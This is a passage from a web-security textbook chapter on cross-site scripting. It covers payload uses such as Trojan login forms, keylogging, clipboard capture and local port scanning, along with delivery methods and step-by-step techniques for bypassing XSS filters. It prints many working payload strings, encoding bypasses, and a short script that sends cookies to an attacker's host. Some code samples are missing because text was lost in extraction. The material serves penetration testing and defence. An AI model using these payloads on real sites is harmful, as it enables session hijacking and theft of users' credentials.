This attack involves injecting malicious data into a page of a web application

to feed misleading information to users of the application. It may simply

involve injecting HTML mark-up into the site, or it may use scripts (sometimes

hosted on an external server) to inject elaborate content and navigation into

the site. This kind of attack is known as virtual defacement because the actual

content hosted on the target’s web server is not modified — the defacement is

Chapter 12 ■ Attacking Other Users 391

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 391

generated solely because of the way the application processes and renders

user-supplied input.

In addition to frivolous mischief, this kind of attack could be used for seri-

ous criminal purposes. A professionally crafted defacement, delivered to the

right recipients in a convincing manner, could be picked up by the news media

and have real-world effects on people’s behavior, stock prices, and so on, to the

financial gain of the attacker, as illustrated in Figure 12-7.

Figure 12-7: A virtual defacement attack exploiting an XSS flaw

Injecting Trojan Functionality

This attack goes beyond virtual defacement and injects actual working func-

tionality into the vulnerable application, designed to deceive end users into

performing some undesirable action, such as entering sensitive data that is

then transmitted to the attacker.

An obvious attack involving injected functionality is to present users with a

Trojan login form that submits their credentials to a server controlled by the

attacker. If skillfully executed, the attack may also seamlessly log the user in to

the real application, so that they do not detect any anomaly in their experience.

The attacker is then free to use the victim’s credentials for his own purposes.

This type of payload lends itself well to a phishing-style attack, in which users

are fed a crafted URL within the actual authentic application and advised that

they will need to log in as normal to access it.

Another obvious attack is to ask users to enter their credit card details, usu-

ally with the inducement of some attractive offer. For example, Figure 12-8

shows a proof-of-concept attack created by Jim Ley, exploiting a reflected XSS

vulnerability found in Google in 2004.

392 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 392

Figure 12-8: A reflected XSS attack injecting Trojan functionality

Because the URLs in these attacks point to the authentic domain name of the

actual application, with a valid SSL certificate where applicable, they are far

more likely to persuade victims to submit sensitive information than pure

phishing web sites that are hosted on a different domain and merely clone the

content of the targeted web site.

COMMON MYTH “We’re not worried about any XSS bugs in the

unauthenticated part of our site — they can’t be used to hijack sessions.”

This thought is erroneous for two reasons. First, an XSS bug in the

unauthenticated part of an application can normally be used to directly

compromise the sessions of authenticated users. Hence, an unauthenticated

reflected XSS flaw is typically more serious than an authenticated one, because

the scope of potential victims is wider. Second, even if a user is not yet

authenticated, an attacker can deploy some Trojan functionality which persists

in the victim’s browser across multiple requests, waiting until they log in, and

then hijacking the resulting session.

Chapter 12 ■ Attacking Other Users 393

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 393

Inducing User Actions

If an attacker hijacks a victim’s session, then they can use the application “as”

that user, and carry out any action on their behalf. However, this approach to

performing arbitrary actions may not always be desirable. It requires that the

attacker monitor their own server for submissions of captured session tokens

from compromised users, and it requires them to carry out the relevant action

on behalf of each and every user. If many users are being attacked, this may

not be practicable. Further, it leaves a rather unsubtle trace in any application

logs, which could be trivially used to identify the computer responsible for the

unauthorized actions during any investigation.

An alternative to session hijacking, when an attacker simply wants to carry

out a specific set of actions on behalf of each compromised user, is to use the

attack payload script itself to perform the actions. This attack payload is partic-

ularly useful in cases where an attacker wishes to perform some action which

requires administrative privileges, such as modifying the permissions assigned

to an account which he controls. With a large user base, it would be laborious to

hijack each user’s session and establish whether the victim was an administra-

tor. A more effective approach is to induce every compromised user to attempt

to upgrade the permissions on the attacker’s account. Most attempts will fail,

but the moment an administrative user is compromised, the attacker will suc-

ceed in escalating privileges. Ways of inducing actions on behalf of other users

are described in the “Request Forgery” section, later in this chapter.

The MySpace XSS worm described earlier is an example of this attack pay-

load, and illustrates the power of such an attack to perform unauthorized

actions on behalf of a mass user base with minimal effort by the attacker.

An attacker whose primary target is the application itself, but who wishes to

remain as stealthy as possible, can leverage this type of XSS attack payload

to cause other users to carry out malicious actions of his choosing against the

application. For example, the attacker could cause another user to exploit a

SQL injection vulnerability to add a new administrator to the table of user

accounts within the database. The attacker would control the new account, but

any investigation of application logs may conclude that a different user was

responsible.

Exploiting Any Trust Relationships

You have already seen one important trust relationship which XSS may

exploit: browsers trust JavaScript received from a web site with the cookies

394 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 394

issued by that web site. There are several other trust relationships that can

sometimes be exploited in an XSS attack:

■■

If the application employs forms with autocomplete enabled, JavaScript

issued by the application can capture any previously entered data that

the user’s browser has stored in the autocomplete cache. By instantiat-

ing the relevant form, waiting for the browser to autocomplete its con-

tents, and then querying the form field values, the script can steal this

data and transmit it to the attacker’s server. The same technique can

also be performed against the Firefox password manager to steal the

user’s credentials for the application. This attack can be more powerful

than injecting Trojan functionality, because sensitive data can be cap-

tured without requiring any interaction by the user.

■■

Some web applications recommend or require that users add their

domain name to the “Trusted Sites” zone of their browser. This is

almost always undesirable and means that any XSS-type flaw can be

exploited to perform arbitrary code execution on the computer of a

victim user. For example, if a site is running in the Trusted Sites zone of

Internet Explorer, then injecting the following code will cause the Win-

dows calculator program to launch on the user’s computer:

var o = new ActiveXObject(‘WScript.shell’);

o.Run(‘calc.exe’);

</script>

■■

Web applications often deploy ActiveX controls containing powerful

methods (see the “Attacking ActiveX Controls” section, later in this

chapter). Some applications seek to prevent misuse by a third party by

verifying within the control itself that the invoking web page was

issued from the correct web site. In this situation, the control can still be

misused via an XSS attack, because in that instance the invoking code

will satisfy the trust check implemented within the control.

COMMON MYTH “Phishing and XSS only affect applications on the public

Internet.”

XSS bugs can affect any type of web application, and an attack against an

intranet-based application, delivered via a group email, can exploit two forms

of trust. First, there is the social trust exploited by an internal email sent

between colleagues. Second, victims’ browsers will often trust corporate web

servers more than they do those on the public Internet — for example, with

Internet Explorer if a computer is part of a corporate domain, the browser will

default to a lower level of security when accessing intranet-based applications.

Chapter 12 ■ Attacking Other Users 395

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 395

Escalating the Client-Side Attack

There are numerous ways in which a web site may directly attack users who

visit it. Any of these attacks may be delivered via a cross-site scripting flaw in

a vulnerable application (although they may also be delivered directly by any

malicious web site that a user happens to visit).

Log Keystrokes

JavaScript can be used to monitor all keys pressed by the user while the

browser window is active, including passwords, private messages, and other

personal information. The following proof-of-concept script will capture all

keystrokes in Internet Explorer and display them in the status bar of the

browser:

window.status += String.fromCharCode(window.event.keyCode);

} </script>

Capture Clipboard Contents

JavaScript can be used to capture the contents of the clipboard. The following

proof-of-concept script will display an alert containing the current contents of

the clipboard:

alert(window.clipboardData.getData(‘Text’));

</script>

Monitoring the clipboard periodically while a user works on other tasks

might result in all kinds of information being captured. For example, there are

some secure email applications that use the clipboard when encrypting and

decrypting messages, and do not clear its contents after use. (Note that Inter-

net Explorer 7 asks the user for permission before allowing clipboard contents

to be captured, to prevent this type of attack.)

Steal History and Search Queries

JavaScript can be used to perform a brute-force exercise to discover third-

party sites recently visited by the user, and queries that they have performed

on popular search engines. This can be done by dynamically creating hyper-

links for common web sites, and for common search queries, and using the

getComputedStyle API to test whether the link is colorized as visited or not

visited. A huge list of possible targets can be quickly checked with minimal

impact on the user.

396 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 396

Enumerate Currently Used Applications

JavaScript can be used to determine whether the user is presently logged in to

third-party web applications. Most applications contain protected pages that

can be viewed only by logged-in users, such as a My Details page. If an unau-

thenticated user requests the page, she receives different content such as an

error message or a redirection to the login.

This behavior can be leveraged to determine whether a user is logged in to

a third-party application. The injected script can issue a request for the pro-

tected page to determine its state. A key constraint here, of course, is

that although the script can make arbitrary requests, it cannot process

the responses, due to the browser’s same origin policy. However, recall that

the same origin policy treats scripts themselves as code rather than data, and

applications are allowed to load and execute scripts from a different domain.

This provides enough of a toehold for an attacker to determine what state the

protected page is in and, therefore, whether the user is logged in.

The trick is to attempt to dynamically load and execute the protected page

as a piece of JavaScript:

window.onerror = fingerprint;

Of course, whatever state the protected page is in, it contains only HTML, so

a JavaScript console error is thrown. Crucially, the console error will contain a

different line number and error type depending on the exact HTML document

returned. The attacker can implement an error handler (in the

fingerprint

function) that checks for the line number and error type that arise when the

user is logged in. Despite the same origin restrictions, the attacker’s script can

thereby deduce what state the protected page is in.

Having determined which popular third-party applications the user is

presently logged in to, the attacker can then carry out highly focused cross-site

request forgery attacks, to perform arbitrary actions within those applications

in the security context of the compromised user (see the “Request Forgery”

section, later in this chapter).

Port Scan the Local Network

Using techniques pioneered by Jeremiah Grossman and Robert Hansen,

JavaScript can be used to perform a port scan of hosts on the user’s local net-

work, to identify services that may be exploitable. If a user is behind a corpo-

rate or home firewall, an attacker will be able to reach services that cannot be

accessed from the public Internet. If the attacker scans the client computer’s

loopback interface, he may be able to bypass any personal firewall installed by

the user.

Chapter 12 ■ Attacking Other Users 397

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 397

Browser-based port scanning can use a Java applet to determine the user’s

IP address (which may be NAT-ed from the public Internet), and so infer the IP

range of the local network. The script can then initiate HTTP connections to

arbitrary hosts and ports to test connectivity. As already described, the same

origin policy prevents the script from processing the responses to these

requests. However, a similar trick as was used to detect login status can also be

used to test for network connectivity. Here, the attacker’s script attempts to

dynamically load and execute a script from each targeted host and port. If a

web server is running on that port, it will return HTML or some other content,

resulting in a JavaScript console error that the port scanning script can detect.

Otherwise, the connection attempt will time out or return no data, in which

case no error is thrown. Hence, despite the same origin restrictions, the port-

scanning script can confirm connectivity to arbitrary hosts and ports.

Attack Other Network Hosts

Following a successful port scan to identify other hosts, a malicious script can

attempt to fingerprint each discovered service and then attack it in various

ways. Many web servers contain image files located at unique URLs. The fol-

lowing code checks for a specific image associated with a popular range of

DSL routers:

If the function notNetgear is not invoked, then the server has been success-

fully fingerprinted. The script can then proceed to attack the web server, either

by exploiting any known vulnerabilities in the particular software, or by per-

forming a request forgery attack (described later in this chapter). In this exam-

ple, the attacker could attempt to reconfigure the router to open up additional

ports on its external interface, or expose its administrative function to the

world. Note that many highly effective attacks of this kind only require the

ability to issue arbitrary requests, not to process their responses, and so are not

affected by the browser’s same origin policy.

In certain situations, an attacker may be able to leverage anti-DNS pinning

techniques to violate the same origin policy and actually retrieve content from

web servers on the local network. These attacks are described later in this

chapter.

Going beyond attacks against web servers, Wade Alcorn has performed

some interesting research demonstrating the possibilities for attacking other

network services via a hijacked browser. See the following paper for more

details:

www.ngssoftware.com/research/papers/InterProtocolExploitation.pdf

398 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 398

Exploit Browser Vulnerabilities

If bugs exist within the user’s browser or any installed plug-ins, an attacker

may be able to exploit these via malicious JavaScript or HTML. In some cases,

bugs within plug-ins such as the Java VM have enabled attackers to perform

two-way binary communication with non-HTTP services on the local com-

puter or elsewhere, enabling the attacker to exploit vulnerabilities that exist

within other services identified via port scanning. Many software products

(including non–browser-based products) install ActiveX controls that may

contain vulnerabilities.

Delivery Mechanisms for XSS Attacks

Having identified an XSS vulnerability and formulated a suitable payload to

exploit it, an attacker needs to find some means of delivering the attack to

other users of the application. We have already discussed several ways in

which this can be done. In fact, there are many other delivery mechanisms

available to an attacker.

Delivering Reflected and DOM-Based XSS Attacks

In addition to the obvious phishing vector of bulk emailing a crafted URL to

random users, an attacker may attempt to deliver a reflected or DOM-based

XSS attack via the following mechanisms:

■■

In a targeted attack, a forged email may be sent to a single target user,

or a small number of users. For example, an application administrator

could be sent an email apparently originating from a known user, com-

plaining that a specific URL is causing an error. When an attacker wants

to compromise the session of a specific user (rather than harvest those

of random users) a well-informed and convincing targeted attack is

often the most effective delivery mechanism.

■■

A URL can be fed to a target user in an instant message.

■■

Content and code on third-party web sites can be used to generate

requests that trigger XSS flaws. For example,

wahh-innocuous.com

might contain interesting content as an inducement for users to visit,

but it may also contain scripts that cause the user’s browser to make

requests containing XSS payloads to a vulnerable application. If a user

is logged in to the vulnerable application, and happens to browse

wahh-

innocuous.com

, then the user’s session with the vulnerable application

will be compromised.

Having created a suitable web site, an attacker may use search engine

manipulation techniques to generate visits from suitable users — for

Chapter 12 ■ Attacking Other Users 399

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 399

example, by placing relevant keywords within the site content and link-

ing to the site using relevant expressions. This delivery mechanism has

nothing to do with phishing, however — the attacker’s site does not

attempt to impersonate the site that it is targeting.

Note that this delivery mechanism can enable an attacker to exploit

reflected and DOM-based XSS vulnerabilities that can be triggered only

via

POST requests. With these vulnerabilities, there is obviously not a

simple URL that can be fed to a victim user to deliver an attack. How-

ever, a malicious web site may contain an HTML form that uses the

POST method and has the vulnerable application as its target URL.

JavaScript or navigational controls on the page can be used to submit

the form, successfully exploiting the vulnerability.

■■

In a variation on the third-party web site attack, some attackers have

been known to pay for banner advertisements that link to a URL con-

taining an XSS payload for a vulnerable application. If a user is logged

in to the vulnerable application, and clicks on the ad, then her session

with that application is compromised. Because many providers use

keywords to assign advertisements to pages that are related to them,

cases have even arisen where an ad attacking a particular application is

assigned to the pages of that application itself! This not only lends cred-

ibility to the attack but also guarantees that someone who clicks on the

ad is using the vulnerable application at the moment the attack strikes.

Further, because many banner ad providers charge on a per-click basis,

this technique effectively enables an attacker to “buy” a specific num-

ber of user sessions.

■■

Many web applications implement a function to “tell a friend” or send

feedback to site administrators. This function often enables a user to

generate an email with arbitrary content and recipients. An attacker

may be able to leverage this functionality to deliver an XSS attack via

an email that actually originates from the organization’s own server,

increasing the likelihood that even technically knowledgeable users and

anti-malware software will accept it.

Delivering Stored XSS Attacks

There are two kinds of delivery mechanisms for stored XSS attacks: in-band

and out-of-band.

In-band delivery applies in most cases and is used when the data that is the

subject of the vulnerability is supplied to the application via its main web

400 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 400

Chapter 12 ■ Attacking Other Users 401

interface. Common locations where user-controllable data may eventually be

displayed to other users include:

■■

Personal information fields — name, address, email, telephone, and

the like.

■■

Names of documents, uploaded files, and other items.

■■

Feedback or questions to application administrators.

■■

Messages, comments, questions, and the like to other application users.

■■

Anything that is recorded in application logs and displayed in-browser to

administrators, such as URLs, usernames, HTTP

Referer, User-Agent,

and the like.

In these cases, the XSS payload is delivered simply by submitting it to the

relevant page within the application and then waiting for victims to view the

malicious data.

Out-of-band delivery applies in cases where the data that is the subject of

the vulnerability is supplied to the application through some other channel.

The application receives data via this channel and ultimately renders it within

HTML pages that are generated within its main web interface. An example of

this delivery mechanism is the attack already described against web mail

applications, which involves sending malicious data to an SMTP server, which

is eventually displayed to users within an HTML-formatted email message.

Finding and Exploiting XSS Vulnerabilities

A basic approach to identifying XSS vulnerabilities is to use a standard proof-

of-concept attack string such as the following:

“><script>alert(document.cookie)</script>

This string is submitted as every parameter to every page of the application,

and responses are monitored for the appearance of this same string. If cases are

found where the attack string appears unmodified within the response, then

the application is almost certainly vulnerable to XSS.

If your intention is simply to identify some instance of XSS within the applica-

tion as quickly as possible in order to launch an attack against other app lication

users, then this basic approach is probably the most effective, because it can be

highly automated and produces minimal false positives. However, if your objec-

tive is to perform a comprehensive test of the application, designed to locate as

many individual vulnerabilities as possible, then the basic approach needs to be

supplemented with more sophisticated techniques. There are several different

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 401

ways in which XSS vulnerabilities may exist within an application that will not

be identified via the basic approach to detection:

■■

Many applications implement rudimentary blacklist-based filters in an

attempt to prevent XSS attacks. These filters typically look for expres-

sions like

action such as removing or encoding the expression, or blocking the

request altogether. The attack strings commonly employed in the basic

approach to detection will often be blocked by these filters. However,

just because one common attack string is being filtered, this does not

demonstrate that an exploitable vulnerability does not exist. As you

will see, there are cases in which a working XSS exploit can be created

without using

characters like

“< >and /.

■■

The anti-XSS filters implemented within many applications are defec-

tive and can be circumvented through various means. For example,

suppose that an application strips any

before it is processed. This means that the attack string used in the basic

approach will not be returned in any of the application’s responses.

However, it may be that one or more of the following strings will

bypass the filter, and result in a successful XSS exploit:

“><script >alert(document.cookie)</script >

“><ScRiPt>alert(document.cookie)</ScRiPt>

“%3e%3cscript%3ealert(document.cookie)%3c/script%3e

“><scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%00”><script>alert(document.cookie)</script>

Note that in some of these cases, the input string may be sanitized, decoded,

or otherwise modified before being returned in the server’s response, and yet

might still be sufficient for an XSS exploit. In this situation, no detection

approach based upon submitting a specific string and checking for its appear-

ance in the server’s response will in itself succeed in finding the vulnerability.

In exploits of DOM-based XSS vulnerabilities, the attack payload is not nec-

essarily returned in the server’s response but is retained in the browser DOM

and accessed from there by client-side JavaScript. Again, in this situation, no

approach based upon submitting a specific string and checking for its appear-

ance in the server’s response will succeed in finding the vulnerability.

Finding and Exploiting Reflected XSS Vulnerabilities

The most reliable approach to detecting reflected XSS vulnerabilities begins in

a similar way to the basic approach described previously.

402 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 402

HACK STEPS

■ Choose a unique arbitrary string which does not appear anywhere within

the application and which contains only alphabetical characters and so is

unlikely to be affected by any XSS-specific filters. For example:

myxsstestdmqlwp

■ Submit this string as every parameter to every page, targeting only one

parameter at a time.

■ Monitor the application’s responses for any appearance of this same

string. Make a note of every parameter whose value is being copied into

the application’s response. These are not necessarily vulnerable, but

each instance identified is a candidate for further investigation, as

described in the next part of this section.

■ Note that both GET and POST requests need to be tested, and you should

include every parameter within both the URL query string and the mes-

sage body. While a smaller range of delivery mechanisms exists for XSS

vulnerabilities that can only be triggered via a POST request, exploitation

is still possible, as previously described.

■ In addition to the standard request parameters, you should also test

every instance in which the contents of an HTTP request header is

processed by the application. A common XSS vulnerability arises in error

messages, where items such as the Referer and User-Agent headers

are copied into the contents of the message. These headers are valid

vehicles for delivering a reflected XSS attack, because an attacker can use

a Flash object to induce a victim to issue a request containing arbitrary

HTTP headers.

Each potential vulnerability you have noted needs to be manually investi-

gated to verify whether it is actually exploitable. Your objective here is to find

a way of crafting your input such that, when it is copied into the same location

in the application’s response, it will result in execution of arbitrary JavaScript.

Let’s look at some examples of this.

Example 1

Suppose that the returned page contains the following:

One obvious way to craft an XSS exploit is to terminate the double quotation

marks that are enclosing your string, close the

<input> tag, and then employ

Chapter 12 ■ Attacking Other Users 403

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 403

some means of introducing JavaScript (using <script>, <img src=

’javascript:...’>

, etc.). For example:

“><script>alert(document.cookie)</script><! --

An alternative method in this situation, which may bypass certain input fil-

ters, is to remain within the

<input> tag itself but inject an event handler con-

taining JavaScript. For example:

“onfocus=”alert(document.cookie)

Example 2

Suppose that the returned page contains the following:

Here, the string you control is being inserted directly into an existing script.

To craft an exploit, you can terminate the single quotation marks around your

string, terminate the statement with a semicolon, and then proceed directly to

your desired JavaScript. For example:

‘; alert(document.cookie); var foo=’

Note that because you have terminated a quoted string, to prevent errors

occurring within the JavaScript interpreter it is necessary to ensure that the

script continues gracefully with valid syntax after your injected code. In this

example, the variable

foo is declared, and a second quoted string is opened,

which will be terminated by the code that immediately follows your string.

Another method that is often effective is to end your input with

// to comment

out the remainder of the line.

Example 3

Suppose that the returned page contains the following:

Here, the string you control is being inserted into the src attribute of an <img>

tag. On some browsers, this attribute may contain a URL that uses the

javascript: protocol, allowing the following straightforward exploit to be used:

javascript:alert(document.cookie);

For an attack that works against all current browsers, you can use an invalid

image name together with an

onerror event handler:

“onerror=”alert(document.cookie)

404 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 404

Chapter 12 ■ Attacking Other Users 405

TIP As with other attacks, be sure to URL-encode any special characters that

have a significance within the request, including &=+;and space.

Other Entry Points for JavaScript

In addition to the common examples just illustrated, there are numerous other

possible entry points for XSS attacks, arising from the complexities of the

HTML language. Many of these examples are affected by anomalies in the way

different browser platforms and versions handle unusual HTML. For example:

■■

On Internet Explorer, many tags will accept a style attribute containing

JavaScript in an

expression string. For example:

style=x:expression(alert(document.cookie))

■■

In Firefox, if you control the content attribute of a refresh meta tag, you

can inject a URL that uses the

javascript: protocol (as well as doing

arbitrary redirects). For example:

.cookie);>

If you encounter any unusual situations that you are unfamiliar with, we

recommend that you consult the excellent XSS Cheat Sheet maintained by

RSnake, located here:

http://ha.ckers.org/xss.html

HACK STEPS

For each potential XSS vulnerability noted in the previous steps:

■ Review the HTML source to identify the location(s) of your unique string.

■ If the string appears more than once, then each occurrence needs to be

treated as a separate potential vulnerability and investigated individually.

■ Determine, from the location within the HTML of the user-controllable

string, how you need to modify it in order to cause execution of arbitrary

JavaScript. Typically, numerous different methods will be potential vehi-

cles for an attack.

■ Attempt to use the various injection vectors described, and consult the

XSS Cheat Sheet at http://ha.ckers.org/xss.html to identify addi-

tional unusual vectors.

■ Test your exploit by submitting it to the application. If your crafted string

is still returned unmodified, then the application is vulnerable. Double-

check that your syntax is correct by using a proof-of-concept script to

display an alert dialog, and confirm that this actually appears in your

browser when the response is rendered.

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 405

Very often, you will discover that your initial attempted exploits do not

actually get returned unmodified by the server, and so do not succeed in exe-

cuting your JavaScript. If this happens, do not give up! Your next task is to

determine what server-side processing is occurring that is affecting your

input. There are three broad possibilities:

■■

The application has identified an attack signature and has blocked your

input altogether.

■■

The application has accepted your input but has performed some kind

of sanitization or encoding on the attack string.

■■

The application has truncated your attack string to a fixed maximum

length.

We will look at each scenario in turn and discuss various ways in which the

obstacles presented by the application’s processing can be bypassed.

Beating Signature-Based Filters

In the first type of filter, the application will typically respond to your attack

string with an entirely different response than it did for the harmless string —

for example, with an error message, possibly even stating that a possible XSS

attack was detected, as shown in Figure 12-9.

Figure 12-9: An error message generated by ASP.NET’s anti-XSS filters

If this occurs, then the next step is to determine what characters or expres-

sions within your input are triggering the filter. An effective approach is to

remove different parts of your string in turn and see whether the input is still

being blocked. Typically, this process establishes fairly quickly that a specific

expression such as

406 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 406

case, then you need to test the filter to establish whether any bypasses exist.

The bypasses that are commonly found in real-world XSS filters include the

following:

■■

Many filters match specific tags, including the opening and closing

angle brackets. However, most browsers tolerate whitespace before the

closing bracket, which allows an easy bypass of the filter. For example:

■■

Because many people write HTML in lowercase, some filters check for

only the usual lowercase version of malicious tags. These filters can be

bypassed by varying the case. For example:

■■

Some filters match any pair of opening and closing angle brackets, with

any content in between. Even if you have no alternative but to inject a

new tag, it is often possible to bypass this filter by relying upon the

existing surrounding syntax to close your injected tag for you. For

example, if you control the value of the

value attribute here:

then you can use input like the following, which is not blocked by the

filter, to inject a new tag containing JavaScript:

foo”><x style=”x:expression(alert(document.cookie))

A further trick you can use against this kind of filter is to exploit the fact

that in many contexts browsers tolerate unclosed HTML tags. The fol-

lowing is invalid HTML, and yet the injected JavaScript is still exe-

cuted:

<img src=”“ onerror=alert(document.cookie)

■■

Some filters match pairs of opening and closing angle brackets, extract

the contents, and compare this to a blacklist of tag names. In this situa-

tion, you may be able to bypass the filter by using superfluous brackets,

which are tolerated by the browser. For example:

<<script>alert(document.cookie);//<</script>

Chapter 12 ■ Attacking Other Users 407

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 407

■■

Some filters stop processing a string when they encounter a null byte,

even though the text following the null byte is still returned in the

application’s response. These filters can be bypassed by inserting a

URL-encoded null byte before the filtered expression. For example:

foo%00<script>

■■

Depending on the target browser, you can often insert characters into a

filtered expression that will bypass the filter and yet be tolerated by the

browser. For example:

<script/src=...

<scr%00ipt>

expr/****/ession

■■

If user-supplied data is (further) canonicalized after the filter is applied,

then it may be possible to bypass the filter and still exploit the vulnera-

bility, by URL-encoding or double-encoding the filtered expression. For

example:

%3cscript%3e

%253cscript%253e

■■

A particular case of the generic canonalization bypass arises in relation

to XSS, because attack payloads returned in responses may be decoded

by the victim’s browser, after all input validation performed by the

server has been completed. In certain situations, you can HTML-encode

your attack payload to defeat the server’s input validation, and the vic-

tim’s browser will decode your payload again for you. For example, the

expression

javascript: is often blocked to defeat attacks using this

protocol. However, the expression can be HTML-encoded in various

ways that are tolerated by many browsers. For example:

<img src=javascript

: ...

<img src=javasc

ript: ...

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A ...

These examples respectively use standard UTF-8 encoding, standard

encoding with superfluous padding, and encoding in hexadecimal with

semicolons omitted. The various possible permutations of the different

encoding types are of course very large.

408 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 408

TIP In some cases, you may succeed in being able to execute some JavaScript

but face restrictions on the commands and keywords that you can employ in

your code. In this situation, the application’s filters can often be bypassed by

building and executing statements dynamically. For example, if the application

blocks any user-supplied data containing the expression document.cookie,

then this can be trivially bypassed using

var a = “alert(doc” + “ument.coo” + “kie)“; eval(a);

or even

var a = “alert(“ + String.fromCharCode(100,111,99,117,109,101,110,

116,46,99,111,111,107,105,101) + “)“; eval(a);

Beating Sanitization

Of all the obstacles that you may encounter when attempting to exploit poten-

tial XSS conditions, this is probably the most common. Here, the application

performs some kind of sanitization or encoding on your attack string which

renders it harmless, preventing it from causing the execution of JavaScript.

The most prevalent manifestation of data sanitization occurs when the

application HTML-encodes certain key characters that are necessary to deliver

an attack (so

< becomes < and > becomes >). In other cases, the applica-

tion may remove altogether certain characters or expressions, in an attempt to

cleanse your input of malicious content.

When this defense is encountered, the first step is to determine precisely

which characters and expressions are being sanitized, and whether it is still

possible to carry out an attack with the remaining characters. For example, if

your data is being inserted directly into an existing script, you may not need to

employ any HTML tag characters. If it appears impossible to perform an attack

without using input that is being sanitized, then you need to test the effective-

ness of the sanitizing filter to establish whether any bypasses exist. Here are

some examples of common bypasses:

■■

If the filter removes certain expressions altogether, and at least one of

the removed expressions is more than one character in length, then it

may be possible to smuggle that expression past the filter, provided that

the sanitization is not applied recursively. For example:

<scr<script>ipt>

■■

As previously described for signature-based filters, it may be possible

to bypass a sanitizing filter by encoding filtered expressions or by

inserting a null byte before them.

Chapter 12 ■ Attacking Other Users 409

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 409

■■

When you are injecting into a quoted string in an existing script, it is

common to find that the application places the backslash character

before any quotation mark characters that you inject. This escapes your

quotation marks, preventing you from terminating the string and inject-

ing arbitrary script. In this situation, you should always verify whether

the backslash character itself is being escaped. If not, then a simple filter

bypass is possible. For example, if you control the value

foo in

var a = ‘foo’;

then you can inject

foo\‘; alert(document.cookie);//

This results in the following response, in which you now control the

script. Note the use of the JavaScript comment character

// to comment

out the remainder of the line, thus preventing a syntax error caused by

the application’s own string delimiter:

var a = ‘foo\\‘; alert(document.cookie);//‘;

■■

In the preceding example, if you find that the backslash character is also

being properly escaped, but that angle brackets are returned unsani-

tized, then you can use the following attack:

</script><script>alert(document.cookie)</script>

This effectively abandons the application’s original script and injects a

new one immediately after it. The attack works because browsers’ pars-

ing of HTML tags takes precedence over their parsing of embedded

JavaScript:

Although the original script now contains an error, this does not matter

because the browser moves on and executes your injected script

regardless of the error in the original script.

■■

In the previous two attacks, where you are able to take control of a

script but are prevented from using either single or double quotation

marks because these are being escaped, you can use the

String.from-

CharCode

trick to construct strings without the need for delimiters.

410 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 410

TIP In several of the filter bypasses described, the attack results in HTML that

is malformed but is nevertheless tolerated by the client browser. Because

numerous quite legitimate web sites contain HTML that does not strictly comply

to the standards, browsers accept HTML that is deviant in all kinds of ways, and

effectively fix up the errors behind the scenes, before the page is rendered.

Often, when you are trying to fine-tune an attack in an unusual situation, it can

be helpful to view the virtual HTML that the browser constructs out of the

server’s actual response. In Firefox, you can use the WebDeveloper tool, which

contains a View Generated Source function that performs precisely this task.

Beating Length Limits

When the application truncates your input to a fixed maximum length, there

are three possible approaches to creating a working exploit.

The first, rather obvious, method is to attempt to shorten your attack pay-

load by using JavaScript APIs with the shortest possible length and removing

characters which are usually included but strictly unnecessary. For example, if

you are injecting into an existing script, the following 28-byte command will

transmit the user’s cookies to the server with hostname

open(“//a/“+document.cookie)

Alternatively, if you are injecting straight into HTML, the following 30-byte

tag will load and execute a script from the server with hostname

On the Internet, these examples would obviously need to be expanded to

contain a valid domain name or IP address. However on an internal corporate

network, it may actually be possible to use a machine with the WINS name

to host the recipient server.

TIP You can use Dean Edwards’s JavaScript packer to shrink a given script as

far as possible by eliminating unnecessary whitespace. This utility also converts

scripts to a single line, for easy insertion into a request parameter:

http://dean.edwards.name/packer/

The second, potentially more powerful, technique for beating length limits

is to span an attack payload across multiple different locations where user-

controllable input is inserted into the same returned page. For example, con-

sider the following URL:

https://wahh-app.com/account.php?page_id=244&seed=129402931&mode=normal

Chapter 12 ■ Attacking Other Users 411

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 411

which returns a page containing the following:

Suppose that there are length restrictions on each of the fields, such that no

feasible attack string can be inserted into any of them. Nevertheless, you can

still deliver a working exploit, by using the following URL to span a script

across the three locations that you control:

https://myapp.com/account.php?page_id=”><script>/*&seed=*/alert(document

.cookie);/*&mode=*/</script>

When the parameter values from this URL are embedded into the page, the

result is the following:

The resulting HTML is entirely valid and is equivalent to only the portions

highlighted in bold. The chunks of source code in between have effectively

become JavaScript comments (surrounded by the

/* and */ markers) and so

are ignored by the browser. Hence, your script is executed just as if it had been

inserted whole at one location within the page.

TIP The technique of spanning an attack payload across multiple fields can

sometimes be used to beat other types of defensive filters. It is fairly common to

find different data validation and sanitization being implemented on different

fields within a single page of an application. In the previous example, suppose

that the page_id and mode parameters are subject to a maximum length of 12

characters. Because these fields are so short, the application’s developers did

not bother to implement any XSS filters. The seed parameter, on the other

hand, is unrestricted in length, and so rigorous filters were implemented to

prevent the injection of the characters “ < or >. In this scenario, despite the

developers’ efforts, it is still possible to insert an arbitrarily long script into the

seed parameter without employing any of the blocked characters, because the

JavaScript context can be created by data injected into the surrounding fields.

A third technique for beating length limits, which can be highly effective in

